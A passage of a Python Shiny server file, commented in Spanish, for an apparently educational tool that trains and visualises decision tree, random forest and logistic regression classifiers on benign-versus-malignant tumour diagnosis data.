f1_decTree = reactive.Value(-1) - - accuracy_decTree_test = reactive.Value(-1) - recall_decTree_test = reactive.Value(-1) - precision_decTree_test = reactive.Value(-1) - f1_decTree_test = reactive.Value(-1) - - tree_plot_x_coords = reactive.Value() - tree_plot_y_coords = reactive.Value() - tree_plot_texts = reactive.Value() - - tree_conf_mat_train = reactive.Value() - tree_conf_mat_test = reactive.Value() - - #Random Forest: - random_forest_execution_counter = reactive.Value(0) - random_forest_last_estimators_num = reactive.Value(0) - - accuracy_ranForest = reactive.Value(-1) - recall_ranForest = reactive.Value(-1) - precision_ranForest = reactive.Value(-1) - f1_ranForest = reactive.Value(-1) - - accuracy_ranForest_test = reactive.Value(-1) - recall_ranForest_test = reactive.Value(-1) - precision_ranForest_test = reactive.Value(-1) - f1_ranForest_test = reactive.Value(-1) - - ranForest_tree_plot_x_coords = reactive.Value() - ranForest_tree_plot_y_coords = reactive.Value() - ranForest_tree_plot_texts = reactive.Value() - - ranForest_tree_conf_mat_train = reactive.Value() - ranForest_tree_conf_mat_test = reactive.Value() - - #Logistic regression: - logistic_regression_execution_counter = reactive.Value(0) - - accuracy_logReg = reactive.Value(-1) - recall_logReg = reactive.Value(-1) - precision_logReg = reactive.Value(-1) - f1_logReg = reactive.Value(-1) - - accuracy_logReg_test = reactive.Value(-1) - recall_logReg_test = reactive.Value(-1) - precision_logReg_test = reactive.Value(-1) - f1_logReg_test = reactive.Value(-1) - - logReg_conf_mat_train = reactive.Value() - logReg_conf_mat_test = reactive.Value() - - -################# MODULOS DE SERVIDORES AUXILIARES DE LA HERRAMIENTA ######################### - - presentation_server("Presentation_Main") - cleaning_server("cleaning_extra") - correlation_server("correlation_1") - subsetSplit_server("subset_1") - decTree_server("decTree_1") - ranForest_server("ranForest_1") - logReg_server("logReg_1") - shared_algs_server("decTree_shared_1", label="decTree") - shared_algs_server("ranForest_shared_1", label="ranForest") - shared_algs_server("logReg_shared_1", label="logReg") - warnings_general_server("general_warnings") - warnings_algorithms_server("dec_tree_warnings") - warnings_algorithms_server("ran_forest_warnings") - warnings_algorithms_server("log_reg_warnings") - - - -############################################################################################## -#################################### DATOS INICIALES ######################################### -############################################################################################## - -#################################### TABLAS ################################################## - @output - @render.table - def originalTable(): - return original_df - - @output - @render.table - def originalTableTypes(): - original_table_types = original_df.dtypes.to_frame().reset_index().transpose().reset_index(drop=True) - headers = original_table_types.iloc[0] - original_table_types = pd.DataFrame(original_table_types.values[1:], columns=headers) - original_table_types = original_table_types.replace(['int64', 'float64', 'object'],['numérico', 'numérico', 'categórico']) - return original_table_types - -#################################### EFECTOS REACTIVOS ####################################### - - # VER TABLA ORIGINAL: - @reactive.Effect - def _(): - original_table_switch = input.view_original_table() - if original_table_switch == True: - original_table = ui.output_table("originalTable", style = "overflow-x:scroll; height:260px; overflow-y:auto;"), - ui.insert_ui( - ui.div({"id": "inserted-original-table"}, original_table, style = "width:100%; overflow-x:auto;"), - selector="#original-table", - where="beforeEnd", - ) - else: - ui.remove_ui("#inserted-original-table") - - # VER TIPOS DE DATOS ORIGINALES - @reactive.Effect - def _(): - original_table_types_switch = input.view_original_table_types() - if original_table_types_switch == True: - original_table_types = ui.output_table("originalTableTypes", style = "overflow-x:auto;"), - ui.insert_ui( - ui.div({"id": "inserted-original-table-types"}, original_table_types), - selector="#original-table-types", - where="beforeEnd", - ) - else: - ui.remove_ui("#inserted-original-table-types") - - -############################################################################################## -#################################### OBSERVACIÓN DE DATOS #################################### -############################################################################################## - -#################################### EFECTOS REACTIVOS ####################################### - - @reactive.Effect - def _(): - diagnosis_data_converted.get() - diganosis_hist_switch = input.view_diganosis_hist() - if diganosis_hist_switch == True: - ui.remove_ui("#diagnosis-hist-plot") - diganosis_hist_plot = output_widget("widget_diagnosisObservation") - ui.insert_ui( - ui.div({"id": "diagnosis-hist-plot"}, diganosis_hist_plot, style = "width:50%; height: 180px; overflow-x:auto;"), - selector="#data-observation-diagnosis", - where="beforeEnd", - ) - else: - ui.remove_ui("#diagnosis-hist-plot") - - @reactive.Effect - def _(): - # Elementos a los que reaccionar: - input.dropKeyWordSelector() - input.drop_selected_column_clean() - diagnosis_data_converted.get() - input.drop_correlation() - - general_hist_switch = input.view_general_hist() - if general_hist_switch == True: - ui.remove_ui("#general-hist-plot") - # Cálculo de la altura del plot para evitar que se mueva la posición de la página al recalcular el plot - selected_cols = [col for col in clean_df.columns if input.dropKeyWordSelector() in col] - print (selected_cols) - subplot_rows_number = math.ceil(len(selected_cols) / subplot_cols_number) - plot_height = "height: " + str(180*subplot_rows_number) + "px;" - general_hist_plot = output_widget("widget_generalObservation") - ui.insert_ui( - ui.div({"id": "general-hist-plot"}, general_hist_plot, style = "width:100%; overflow-x:auto;" + plot_height), - selector="#data-observation-general", - where="beforeEnd", - ) - else: - ui.remove_ui("#general-hist-plot") - -#################################### WIDGETS ################################################# - - # WIDGET HISTOGRAMA DATOS DIAGNOSIS - @output - @render_widget - def widget_diagnosisObservation(): - # Elementos a los que reaccionar: - input.dropIdSelector() - diagnosis_data_converted.get() - - fig = go.Figure() - if diagnosis_data_converted.get() == False: - fig.add_trace(go.Histogram(x=clean_df['diagnosis'].loc[clean_df['diagnosis'] == 'B'], name='Benigno', marker_color='#5ec962')) - fig.add_trace(go.Histogram(x=clean_df['diagnosis'].loc[clean_df['diagnosis'] == 'M'], name='Maligno', marker_color='#440154')) - else: - fig.add_trace(go.Histogram(x=clean_df['diagnosis'].loc[clean_df['diagnosis'] == 1], name='Maligno = 1', marker_color='#440154', legendgroup="Maligno")) - fig.add_trace(go.Histogram(x=clean_df['diagnosis'].loc[clean_df['diagnosis'] == 0], name='Benigno = 0', marker_color='#5ec962', legendgroup="Benigno")) - - fig.update_layout(autosize=True, - height=180, - margin=dict(l=20, r=20, t=40, b=20), - barmode='stack') - - fig.update_traces(hovertemplate='%{y}') - - return fig - - # WIDGET HISTOGRAMA DATOS GENERALES - @output - @render_widget - def widget_generalObservation(): - # Elementos a los que reaccionar: - diagnosis_data_converted.get() - input.drop_selected_column_clean() - input.drop_correlation() - - selected_cols = [col for col in clean_df.columns if input.dropKeyWordSelector() in col] - - # Dividir dataframe en dos a partir de diagnosis - dfM=pd.DataFrame() - dfB=pd.DataFrame() - if diagnosis_data_converted.get() == False: - dfM=clean_df[clean_df['diagnosis'] == 'M'] - dfB=clean_df[clean_df['diagnosis'] == 'B'] - else: - dfM=clean_df[clean_df['diagnosis'] == 1] - dfB=clean_df[clean_df['diagnosis'] == 0] - - subplot_rows_number = math.ceil(len(selected_cols) / subplot_cols_number) - - fig = make_subplots(rows=subplot_rows_number, cols=subplot_cols_number, - subplot_titles=selected_cols, - ) - - for idx,curr_col in enumerate(selected_cols): - fig.add_trace(go.Histogram(x=dfM[curr_col], name = "Maligno", marker_color='#440154', opacity=0.7, legendgroup="Maligno", showlegend=idx==0), - row=math.floor(idx/subplot_cols_number)+1, col=(idx%subplot_cols_number)+1) - fig.add_trace(go.Histogram(x=dfB[curr_col], name = "Benigno", marker_color='#5ec962', opacity=0.7, legendgroup="Benigno", showlegend=idx==0), - row=math.floor(idx/subplot_cols_number)+1, col=(idx%subplot_cols_number)+1) - - fig.update_layout(autosize=True, - barmode='overlay', - height=180 * subplot_rows_number, - showlegend=True, - margin=dict(l=20, r=20, t=40, b=20)) - - fig.update_traces(hovertemplate='%{y}
      Rango: %{x}') - - return fig - - -############################################################################################## -#################################### LIMPIEZA DE DATOS ####################################### -############################################################################################## - -#################################### TABLAS ################################################## - - @output - @render.table - def cleanTable(): - #Elementos a los que reaccionar: - input.dropIdSelector() - diagnosis_data_converted.get() - correlation_execution_counter.get() - reset_dataframe_counter.get() - - return clean_df - -#################################### EFECTOS REACTIVOS ####################################### - - # CONVERTIR DIAGNOSIS - @reactive.Effect - @reactive.event(input.convert_diagnosis) - def _(): - clean_df['diagnosis'] = original_df['diagnosis'].map({'M':1,'B':0}) - diagnosis_data_converted.set(True) - - # ELIMINAR COLUMNA SELECCIONADA - @reactive.Effect - @reactive.event(input.drop_selected_column_clean) - def _(): - if input.dropIdSelector() in clean_df.columns: - clean_df.drop(input.dropIdSelector(),axis=1,inplace=True) - update_all_selectors() - - # MOSTRAR TABLA LIMPIA - @reactive.Effect - def _(): - clean_table_switch = input.view_clean_table() - if clean_table_switch == True: - clean_table = ui.output_table("cleanTable", style = "overflow-x:scroll; height:260px; overflow-y:auto;"), - ui.insert_ui( - ui.div({"id": "inserted-clean-table"}, clean_table), - selector="#clean-table", - where="beforeEnd", - ) - else: - ui.remove_ui("#inserted-clean-table") - -#################################### UPDATES Y OTROS ######################################### - - # ACTUALIZAR SELECTOR COLUMNA - def update_dropIdSelector(): - column_dict = {} - for col in clean_df.columns: - if col != "diagnosis": - column_dict[col] = col - ui.update_select("dropIdSelector", choices=column_dict, selected=None) - - -############################################################################################## -#################################### CORRELACIÓN DE DATOS #################################### -############################################################################################## - -#################################### EFECTOS REACTIVOS ####################################### - - # ELIMINAR COLUMNAS CON CORRELACIÓN SUPERIOR - @reactive.Effect - @reactive.event(input.drop_correlation) - def _(): - correlation_map = clean_df.drop(['diagnosis'], axis=1).corr().abs() - upper_tri = correlation_map.where(np.triu(np.ones(correlation_map.shape),k=1).astype(bool)) - columns_to_drop = [column for column in upper_tri.columns if any(upper_tri[column] >= input.maximum_correlation())] - clean_df.drop(columns_to_drop, axis=1, inplace=True) - correlation_execution_counter.set(correlation_execution_counter.get() + 1) - update_all_selectors() - - # Actualizar el widget de correlacion tras los cálculos: - correlation_switch = input.view_correlation() - if correlation_switch == True: - ui.remove_ui("#correlation-plot") - correlation_plot = output_widget("widget_correlation") - ui.insert_ui( - ui.div({"id": "correlation-plot"}, correlation_plot, style = "width:100%; overflow-x:auto; overflow-y:auto;"), - selector="#correlation", - where="beforeEnd", - ) - - # VER WIDGET CORRELACIÓN - @reactive.Effect - def _(): - correlation_switch = input.view_correlation() - if correlation_switch == True: - if diagnosis_data_converted.get() == True: - ui.remove_ui("#correlation-plot") - correlation_plot = output_widget("widget_correlation") - ui.insert_ui( - ui.div({"id": "correlation-plot"}, correlation_plot, style = "width:100%; height:1000px; overflow-x:auto; overflow-y:auto;"), - selector="#correlation", - where="beforeEnd", - ) - else: - ui.insert_ui( - ui.div({"id": "correlation-plot"}, correlation_warning_ui("general_warnings")), - selector="#correlation", - where="beforeEnd", - ) - else: - ui.remove_ui("#correlation-plot") - -#################################### WIDGETS ################################################# - - # WIDGET CORRELACIÓN - @output - @render_widget - def widget_correlation(): - #Elementos a los que reaccionar: - input.dropIdSelector() - input.maximum_correlation() - correlation_execution_counter.get() - - if diagnosis_data_converted.get() == False: - return go.Figure() - - correlation_map = clean_df.corr().round(decimals=3) - fig = go.Figure(data=[go.Heatmap(z=correlation_map, - x = correlation_map.columns.values, - y = correlation_map.columns.values, - xgap = 1, - ygap = 1, - colorscale=px.colors.sequential.Viridis_r, - name="") - ]) - - fig.update_layout(autosize=True, - height=min(80*len(clean_df.columns), 1000), - yaxis=dict(scaleanchor = 'x'), - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(text=correlation_map, - texttemplate="%{text}", - hovertemplate='%{x} - %{y}
      Correlación: %{z}') - - fig.update_yaxes(autorange="reversed") - - return fig - - -############################################################################################## -#################################### ALGORITMOS DE PREDICCIÓN ################################ -############################################################################################## - - # SEPARACIÓN ENTRENAMIENTO - TEST (sin funcionalidad real, sólo sirve para crear una mejor UX, la división se realiza al crear los modelos) - @reactive.Effect - @reactive.event(input.make_test_split) - def _(): - test_split_done.set(True) - - -############################################################################################## -#################################### ÁRBOL DE DECISIÓN ####################################### -############################################################################################## - -#################################### IMPORTANTES ############################################# - - # COMPROBACIONES PREVIAS ÁRBOL DE DECISIÓN - def dec_tree_previous_checks(test_size_split, df_len): - if diagnosis_data_converted.get() == False: - ui.insert_ui( - ui.div({"id": "dec-tree-warning"}, diagnosis_warning_ui("dec_tree_warnings")), - selector="#dec_tree_generator", - where="beforeEnd", - ) - return True - - if test_split_done.get() == False: - ui.insert_ui( - ui.div({"id": "dec-tree-warning"}, test_split_warning_ui("dec_tree_warnings")), - selector="#dec_tree_generator", - where="beforeEnd", - ) - return True - - if len(list(input.dec_tree_features_sel())) == 0: - ui.insert_ui( - ui.div({"id": "dec-tree-warning"}, features_warning_ui("dec_tree_warnings")), - selector="#dec_tree_generator", - where="beforeEnd", - ) - return True - - if df_len * test_size_split < 1.0: - ui.insert_ui( - ui.div({"id": "dec-tree-warning"}, test_split_low_warning_ui("dec_tree_warnings")), - selector="#dec_tree_generator", - where="beforeEnd", - ) - return True - - if df_len * ( 1 - test_size_split ) < 1.0: - ui.insert_ui( - ui.div({"id": "dec-tree-warning"}, test_split_high_warning_ui("dec_tree_warnings")), - selector="#dec_tree_generator", - where="beforeEnd", - ) - return True - - return False - - # FIT, PREDICCIÓN Y GUARDADO DE DATOS DEL ÁRBOL DE DECISIÓN - def classification_model_dec_tree(model, data, size_test, predictors, outcome): - # Crear la división de test y entrenamiento! - data_train, data_test = train_test_split(data, test_size = size_test) - - # Fit del modelo: - model.fit(data_train[predictors],data_train[outcome]) - - # Hacer predicciones del set de entrenamiento: - predictions = model.predict(data_train[predictors]) - - # Setear los resultados del set de entrenamiento: - accuracy_decTree.set((metrics.accuracy_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - recall_decTree.set((metrics.recall_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - precision_decTree.set((metrics.precision_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - f1_decTree.set((metrics.f1_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - - # Hacer predicciones del set de test: - predictions_test = model.predict(data_test[predictors]) - - # Setear los resultados del set de test: - accuracy_decTree_test.set((metrics.accuracy_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - recall_decTree_test.set((metrics.recall_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - precision_decTree_test.set((metrics.precision_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - f1_decTree_test.set((metrics.f1_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - - # Creación y guardado de la matriz de confusión - cm_train = metrics.confusion_matrix(predictions,data_train[outcome]) - cm_test = metrics.confusion_matrix(predictions_test,data_test[outcome]) - tree_conf_mat_train.set(cm_train) - tree_conf_mat_test.set(cm_test) - - # Creación de la figura del árbol de decisión - plt.figure(figsize=(12,12)) - m_tree = plot_tree(model, filled=True, feature_names=predictors, class_names=["Benign", "Malign"], rounded=True, fontsize=5) - plt.savefig( str(decTree_image_folder) + "\\" + str(session.id) + '_dec_tree.jpg',format='jpg',bbox_inches = "tight", dpi=600) - # Cerrar todas las figuras para evitar llenar la memoria de información innecesaria - plt.close('all') - - # Guardado de datos de la figura del árbol de decisión - coords = list() - coords_x = list() - coords_y = list() - texts = list() - - for node in m_tree: - coords.append(list(node.get_position())) - texts.append(node.get_text().replace("\n", "
      ")) - - for x, y in coords: - coords_x.append(x) - coords_y.append(y) - - tree_plot_x_coords.set(coords_x) - tree_plot_y_coords.set(coords_y) - tree_plot_texts.set(texts) - -#################################### EFECTOS REACTIVOS ####################################### - - # GENERAR EL MODELO DE ÁRBOL DE DECISIÓN Y REALIZAR TODOS LOS CÁLCULOS - @reactive.Effect - @reactive.event(input.generate_decission_tree) - def _(): - ui.remove_ui("#dec-tree-warning") - - # Obtener el tamaño de la separación de entrenamiento y la longitud de la base de datos para comprobaciones: - test_size_split = input.test_split_value() - df_len = len(clean_df) - - # Comprobaciones previas. Si algo falla, el modelo no se calcula y se reseta todo lo generado para no causar confusión: - if dec_tree_previous_checks(test_size_split, df_len) == True: - # Cerrar todas las visualizaciones - ui.update_switch("view_variable_importance_dec_tree", value=False) - ui.update_switch("conf_mat_dec_tree_switch", value=False) - ui.update_switch("view_tree_dec_tree_switch", value=False) - # Resetear todos los resultados - reset_dec_tree_result_values() - empty_dec_tree_feature_importance_df() - decision_tree_execution_counter.set(0) - return - - # Arreglar valores None para poder ser aceptados por el modelo: - max_depth_val = input.dec_tree_max_depth() - if max_depth_val == 0: - max_depth_val = None - - max_features_value = input.dec_tree_max_features() - if max_features_value == 'None': - max_features_value = None - - # Crear el modelo de árbol de decisión - dec_tree_model = DecisionTreeClassifier(criterion=input.dec_tree_criterion(), - splitter=input.dec_tree_splitter(), - max_depth=max_depth_val, - min_samples_split=input.dec_tree_min_samples_split(), - min_samples_leaf=input.dec_tree_min_samples_leaf(), - max_features=max_features_value) - - # Lista de las características que usamos: - features_list = list(input.dec_tree_features_sel()) - - # Fit y predicciónes del modelo. Guardado de todos los datos - classification_model_dec_tree(dec_tree_model,clean_df,test_size_split,features_list,outcome_var) - - # Variables importantes y guardado de sus resultados - empty_dec_tree_feature_importance_df() - dec_tree_feat_imp = pd.Series(dec_tree_model.feature_importances_, index=features_list).sort_values(ascending=False) - dec_tree_feat_imp_df.insert(0, "Característica", dec_tree_feat_imp.index) - dec_tree_feat_imp_df.insert(1, "Valor", dec_tree_feat_imp.values.round(decimals=3) * 100) - - decision_tree_execution_counter.set(decision_tree_execution_counter.get()+1) - - # MOSTRAR EL WIDGET DE IMPORTANCIA DE VARIABLES DEL ÁRBOL DE DECISIÓN - @reactive.Effect - def _(): - var_imp_dec_tree_switch = input.view_variable_importance_dec_tree() - if var_imp_dec_tree_switch == True: - ui.remove_ui("#var-imp-dec-tree-plot") - if decision_tree_execution_counter.get() > 0: - var_imp_dec_tree_plot = output_widget("widget_dec_tree_var_imp") - ui.insert_ui( - ui.div({"id": "var-imp-dec-tree-plot"}, var_imp_dec_tree_plot, style = "width:100%; overflow-x:auto; overflow-y:auto;"), - selector="#var_imp_dec_tree", - where="beforeEnd", - ) - else: - ui.insert_ui( - ui.div({"id": "var-imp-dec-tree-plot"}, feat_imp_warning_ui("dec_tree_warnings")), - selector="#var_imp_dec_tree", - where="beforeEnd", - ) - else: - ui.remove_ui("#var-imp-dec-tree-plot") - - # DESELECCIONAR VARIABLES POCO IMPORTANTES DEL ÁRBOL DE DECISIÓN - @reactive.Effect - @reactive.event(input.deselect_not_imp_vars_dec_tree) - def _(): - minimum_importance = input.minimum_importance_dec_tree() - important_columns_auto = [feature["Característica"] for idx, feature in dec_tree_feat_imp_df.iterrows() if (feature["Valor"] >= minimum_importance)] - ui.update_checkbox_group("dec_tree_features_sel", selected=important_columns_auto) - - # MOSTRAR LA MATRIZ DE CONFUSIÓN DEL ÁRBOL DE DECISIÓN - @reactive.Effect - def _(): - conf_mat_dec_tree_switch = input.conf_mat_dec_tree_switch() - if conf_mat_dec_tree_switch == True: - ui.remove_ui("#dec-tree-conf-mat-train") - ui.remove_ui("#dec-tree-conf-mat-test") - if decision_tree_execution_counter.get() > 0: - dec_tree_conf_mat_train = output_widget("widget_dec_tree_conf_mat_train") - ui.insert_ui( - ui.div({"id": "dec-tree-conf-mat-train"}, dec_tree_conf_mat_train, style = "width:100%; height:300px; overflow-x:auto; overflow-y:auto;"), - selector="#dec_tree_conf_matrix_train", - where="beforeEnd", - ) - dec_tree_conf_mat_test = output_widget("widget_dec_tree_conf_mat_test") - ui.insert_ui( - ui.div({"id": "dec-tree-conf-mat-test"}, dec_tree_conf_mat_test, style = "width:100%; height:300px; overflow-x:auto; overflow-y:auto;"), - selector="#dec_tree_conf_matrix_test", - where="beforeEnd", - ) - else: - ui.insert_ui( - ui.div({"id": "dec-tree-conf-mat-train"}, conf_matrix_warning_ui("dec_tree_warnings")), - selector="#dec_tree_conf_matrix", - where="beforeEnd", - ) - else: - ui.remove_ui("#dec-tree-conf-mat-train") - ui.remove_ui("#dec-tree-conf-mat-test") - - # MOSTRAR EL WIDGET DEL ÁRBOL DE DECISIÓN - @reactive.Effect - def _(): - view_tree_dec_tree_switch = input.view_tree_dec_tree_switch() - if view_tree_dec_tree_switch == True: - ui.remove_ui("#dec-tree-view-img") - if decision_tree_execution_counter.get() > 0: - dec_tree_view = output_widget("widget_dec_tree_view") - ui.insert_ui( - ui.div({"id": "dec-tree-view-img"}, dec_tree_view, style = "width:100%; height:1000px; overflow-x:auto; overflow-y:auto;"), - selector="#dec_tree_view", - where="beforeEnd", - ) - else: - view_tree_dec_tree_warning = ui.output_text("decision_tree_warning_view_txt"), - ui.insert_ui( - ui.div({"id": "dec-tree-view-img"}, view_tree_dec_tree_warning, style="color:red; font-style:italic; margin-top:20px; padding: 10px; background: #f7f7f7; border-radius: 10px;"), - selector="#dec_tree_view", - where="beforeEnd", - ) - else: - ui.remove_ui("#dec-tree-view-img") - -#################################### WIDGETS ################################################# - - # WIDGET DE LA IMPORTANCIA DE LAS VARIABLES DEL ÁRBOL DE DECISIÓN - @output - @render_widget - def widget_dec_tree_var_imp(): - #Variables a las que reaccionar: - decision_tree_execution_counter.get() - input.view_variable_importance_dec_tree() - - if len(dec_tree_feat_imp_df) == 0: - return go.Figure() - - fig = go.Figure(data=[go.Bar(x = dec_tree_feat_imp_df["Valor"], - y = dec_tree_feat_imp_df["Característica"], - orientation='h', - name="", - marker=dict(color = dec_tree_feat_imp_df["Valor"], - colorscale=px.colors.sequential.Viridis_r)) - ]) - - fig.update_layout(autosize=True, - height=max(280, 40*len(dec_tree_feat_imp_df)), - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(hovertemplate='%{y} : %{x}%') - - fig.update_yaxes(autorange="reversed") - - return fig - - # WIDGET MATRIZ DE CONFUSIÓN ENTRENAMIENTO DEL ÁRBOL DE DECISIÓN - @output - @render_widget - def widget_dec_tree_conf_mat_train(): - cm_map = tree_conf_mat_train.get() - fig = go.Figure(data=[go.Heatmap(z=cm_map, - xgap = 1, - ygap = 1, - colorscale=px.colors.sequential.Teal, - name="") - ]) - - fig.update_xaxes( - autorange="reversed", - ) - - fig.update_layout(title="Matriz de confusión: datos entrenamiento", - xaxis_title="Valores reales", - yaxis_title="Valores predichos", - xaxis = dict( - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - yaxis = dict( - scaleanchor = 'x', - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - autosize=True, - height=300, - width=400, - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(text=cm_map, - texttemplate="%{text}", - hovertemplate='Valor real: %{x}
      Valor predicho: %{y}
      Cantidad: %{z}') - - return fig - - # WIDGET MATRIZ DE CONFUSIÓN TESTING DEL ÁRBOL DE DECISIÓN - @output - @render_widget - def widget_dec_tree_conf_mat_test(): - cm_map = tree_conf_mat_test.get() - fig = go.Figure(data=[go.Heatmap(z=cm_map, - xgap = 1, - ygap = 1, - colorscale=px.colors.sequential.Teal, - name="") - ]) - - fig.update_xaxes( - autorange="reversed", - ) - - fig.update_layout(title="Matriz de confusión: datos test", - xaxis_title="Valores reales", - yaxis_title="Valores predichos", - xaxis = dict( - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - yaxis = dict( - scaleanchor = 'x', - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - autosize=True, - height=300, - width=400, - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(text=cm_map, - texttemplate="%{text}", - hovertemplate='Valor real: %{x}
      Valor predicho: %{y}
      Cantidad: %{z}') - - return fig - - # WIDGET VISUALIZACIÓN DEL ÁRBOL DE DECISIÓN - @output - @render_widget - def widget_dec_tree_view(): - # Variables a las que reaccionar: - decision_tree_execution_counter.get() - - img_path = str(Path(__file__).parent / "DecTrees") + "\\" + str(session.id) + "_dec_tree.jpg" - img_src = Image.open( img_path ) - - fig = go.Figure() - - fig.add_trace( - go.Scatter( - x=tree_plot_x_coords.get(), - y=tree_plot_y_coords.get(), - text=tree_plot_texts.get(), - mode="markers", - marker=dict( - color="white", - size=60, - opacity=0.1, - ), - name="", - ) - ) - - # Configurar ejes - fig.update_xaxes( - visible=False, - range=[0,1], - ) - - fig.update_yaxes( - visible=False, - range=[0,1], - # el atributo de scaleanchor asegura que la relación de aspecto no cambie - scaleanchor="x" - ) - - fig.add_layout_image( - dict( - x=-0.02, - sizex=1.04, - y=1.01, - sizey=1.02, - xref="x", - yref="y", - opacity=1.0, - layer="above", - sizing="stretch", - source=img_src) - ) - - fig = fig.update_traces(hovertemplate='%{text}') - - fig.update_layout(autosize=True, - height=1000, - margin=dict(l=20, r=20, t=40, b=20),) - - return fig - -#################################### TEXTOS ################################################## - - # RESULTADOS - @output - @render.text - def decision_tree_accuracy(): - if accuracy_decTree.get() == -1: - return "Exactitud: " - return "Exactitud: " + str(accuracy_decTree.get()) + "%" - - @output - @render.text - def decision_tree_recall(): - if recall_decTree.get() == -1: - return "Sensibilidad o TVP: " - return "Sensibilidad o TVP: " + str(recall_decTree.get()) + "%" - - @output - @render.text - def decision_tree_precision(): - if precision_decTree.get() == -1: - return "Precisión: " - return "Precisión: " + str(precision_decTree.get()) + "%" - - @output - @render.text - def decision_tree_f1(): - if f1_decTree.get() == -1: - return "F1 Score: " - return "F1 Score: " + str(f1_decTree.get()) + "%" - - @output - @render.text - def decision_tree_accuracy_test(): - if accuracy_decTree_test.get() == -1: - return "Exactitud: " - return "Exactitud: " + str(accuracy_decTree_test.get()) + "%" - - @output - @render.text - def decision_tree_recall_test(): - if recall_decTree_test.get() == -1: - return "Sensibilidad o TVP: " - return "Sensibilidad o TVP: " + str(recall_decTree_test.get()) + "%" - - @output - @render.text - def decision_tree_precision_test(): - if precision_decTree_test.get() == -1: - return "Precisión: " - return "Precisión: " + str(precision_decTree_test.get()) + "%" - - @output - @render.text - def decision_tree_f1_test(): - if f1_decTree_test.get() == -1: - return "F1 Score: " - return "F1 Score: " + str(f1_decTree_test.get()) + "%" - - # WARNING VISUALIZACIÓN ÁRBOL - @output - @render.text - def decision_tree_warning_view_txt(): - return "No se puede mostrar el árbol de decisión sin haber creado el modelo!" - -#################################### UPDATES Y OTROS ######################################### - - # ACTUALIZAR CHECKBOX ÁRBOL DE DECISIÓN - def update_decTree_checkbox_group(): - column_dict = {} - for col in clean_df.columns: - if col != "diagnosis": - column_dict[col] = col - ui.update_checkbox_group("dec_tree_features_sel", choices=column_dict, selected=list(column_dict)) - - - -############################################################################################## -#################################### RANDOM FOREST ########################################### -############################################################################################## - -#################################### IMPORTANTES ############################################# - - # COMPROBACIONES PREVIAS RANDOM FOREST - def ran_forest_previous_checks(test_size_split, df_len): - if diagnosis_data_converted.get() == False: - ui.insert_ui( - ui.div({"id": "ran-forest-warning"}, diagnosis_warning_ui("ran_forest_warnings")), - selector="#ran_forest_generator", - where="beforeEnd", - ) - return True - - if test_split_done.get() == False: - ui.insert_ui( - ui.div({"id": "ran-forest-warning"}, test_split_warning_ui("ran_forest_warnings")), - selector="#ran_forest_generator", - where="beforeEnd", - ) - return True - - if len(list(input.ran_forest_features_sel())) == 0: - ui.insert_ui( - ui.div({"id": "ran-forest-warning"}, features_warning_ui("ran_forest_warnings")), - selector="#ran_forest_generator", - where="beforeEnd", - ) - return True - - if df_len * test_size_split < 1.0: - ui.insert_ui( - ui.div({"id": "ran-forest-warning"}, test_split_low_warning_ui("ran_forest_warnings")), - selector="#ran_forest_generator", - where="beforeEnd", - ) - return True - - if df_len * ( 1 - test_size_split ) < 1.0: - ui.insert_ui( - ui.div({"id": "ran-forest-warning"}, test_split_high_warning_ui("ran_forest_warnings")), - selector="#ran_forest_generator", - where="beforeEnd", - ) - return True - - return False - - # FIT, PREDICCIÓN Y GUARDADO DE DATOS DEL RANDOM FOREST - def classification_model_random_forest(model, data, size_test, predictors, outcome, n_estimators): - # Crear la división de test y entrenamiento! - data_train, data_test = train_test_split(data, test_size = size_test) - - # Fit del modelo: - model.fit(data_train[predictors],data_train[outcome]) - - # Hacer predicciones del set de entrenamiento: - predictions = model.predict(data_train[predictors]) - - # Setear los resultados del set de entrenamiento: - accuracy_ranForest.set((metrics.accuracy_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - recall_ranForest.set((metrics.recall_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - precision_ranForest.set((metrics.precision_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - f1_ranForest.set((metrics.f1_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - - # Hacer predicciones del set de test: - predictions_test = model.predict(data_test[predictors]) - - # Setear los resultados del set de test: - accuracy_ranForest_test.set((metrics.accuracy_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - recall_ranForest_test.set((metrics.recall_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - precision_ranForest_test.set((metrics.precision_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - f1_ranForest_test.set((metrics.f1_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - - # Creación y guardado de la matriz de confusión - cm_train = metrics.confusion_matrix(predictions,data_train[outcome]) - cm_test = metrics.confusion_matrix(predictions_test,data_test[outcome]) - ranForest_tree_conf_mat_train.set(cm_train) - ranForest_tree_conf_mat_test.set(cm_test) - - coords_x_list = list() - coords_y_list = list() - texts_list = list() - - # Creación de las figuras de árboles de decisión (máximo 5 para ahorrar espacio) - for index in range(0, min(5, n_estimators)): - plt.figure(figsize=(12,12)) - m_tree = plot_tree(model.estimators_[index], filled=True, feature_names=predictors, class_names=["Benign", "Malign"], rounded=True, fontsize=5) - plt.savefig( str(ranForest_image_folder) + "\\" + str(session.id) + '_ran_forest' + str(index) + '.jpg',format='jpg',bbox_inches = "tight", dpi=600) - # Cerrar todas las figuras para evitar llenar la memoria de información innecesaria - plt.close('all') - - # Guardado de datos de la figura del árbol de decisión - coords = list() - coords_x = list() - coords_y = list() - texts = list() - - for node in m_tree: - coords.append(list(node.get_position())) - # Arreglo del problema generado por boostrap sampling en los random forest: - new_texts = 